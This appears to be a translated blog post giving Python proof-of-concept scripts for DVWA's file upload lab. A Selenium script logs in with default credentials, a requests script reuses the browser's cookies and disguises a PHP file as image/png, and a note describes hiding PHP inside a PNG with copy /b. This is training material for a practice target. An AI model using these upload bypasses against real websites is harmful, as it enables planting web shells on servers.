POC——DVWA‘s File Upload

Level——low

Recently I learned something about python Of selenium, Just write one with it low Grade POC Well ~

from selenium.webdriver import Chrome
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select
import time

driver = Chrome()
driver.get("http://192.168.117.130/DVWA-1.9/login.php")
WebDriverWait(driver,10).until(lambda d:"Login" in d.title)
driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/p/input').click()

driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/select').click()
loc = (By.XPATH,'//*[@id="main_body"]/div/form/select')
ele = driver.find_element(*loc)
s = Select(ele)
s.select_by_value("low")
driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/input[1]').click()

driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[2]').send_keys('/path/one.php')
driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[3]').click()
response = driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/pre')

re = 'one.php'
flag=re in str(response.text)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

driver.close()

Level-Medium

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import browser_cookie3

cookie = browser_cookie3.chrome()
URL = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/upload/'
fl = open("one.php","rb")
m = MultipartEncoder(
    fields={'MAX_FILE_SIZE': '100000',
            'uploaded': ('one.php',fl,'image/png'),
            'Upload': 'Upload'
            })

headers = {
    "Content-Type": m.content_type
}
response = requests.post(URL, data=m, headers=headers,cookies=cookie)

re = 'one.php'
flag=re in str(response.content)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

another ： I have encountered many problems here before , It takes a long time to deal with these problems alone , Now take a note of ：

• Browser here Content-Type yes multipart/form-data, This type is very interesting and characteristic ,post The form of parameter transmission has not changed , Just put “data:vlaue” The form becomes a randomly generated genetic string as a separator , The separator defines various parameters and binary of the file content , So structure post Multiple file uploads are required when requesting (MultipartEncoder) My bag （ There are other ways , For the convenience of the future , This is used here ）, Link put ad locum ;
• See a lot of online multipart/form-data Type when uploading files , Are used to token This value , But I didn't find it in my grabbed bag , Check it on the Internet , May be DVWA No definition token This key value , But if it is also authentication ,cookie It also has the same effect ,cookie、session、token Put it differently ad locum ;
• request After requesting data , It's automatic url code

Level-High

  Here is one more cmd Next copy one.png /b + one.txt /a two.png Picture steganography process （ because high Level limits the file size ）, Then send the new one to two.png Pass in . This involves the following files including , I won't do that here ~